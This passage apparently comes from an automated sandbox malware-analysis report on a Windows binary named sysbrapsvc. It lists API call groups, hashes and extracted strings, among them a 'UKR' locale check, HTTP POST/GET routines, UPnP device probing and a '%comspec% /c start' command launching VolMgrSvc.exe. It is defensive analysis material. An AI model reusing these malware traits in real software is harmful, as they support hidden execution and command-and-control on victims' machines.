                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040192C
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                • GetTickCount.KERNEL32 ref: 004019F6
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                • GetTickCount.KERNEL32 ref: 00401A43
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: c24e2c281c1906b642cdb759e74aa8db22e1369ec12f41aa5922d382b373e513
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: c24e2c281c1906b642cdb759e74aa8db22e1369ec12f41aa5922d382b373e513
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Strings
                                                                                • C:\Users\user\tbtcmds.dat, xrefs: 004061C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID: C:\Users\user\tbtcmds.dat
                                                                                • API String ID: 1457358591-3965455335
                                                                                • Opcode ID: efe6472d381cb2bf389d5362b33cf11889a757296c607a9731db49fac703d1ba
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: efe6472d381cb2bf389d5362b33cf11889a757296c607a9731db49fac703d1ba
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: af92e2ebcd257162aa272662d4163ff3babde7a1427c0522630bd4b0e64c68b4
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: af92e2ebcd257162aa272662d4163ff3babde7a1427c0522630bd4b0e64c68b4
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
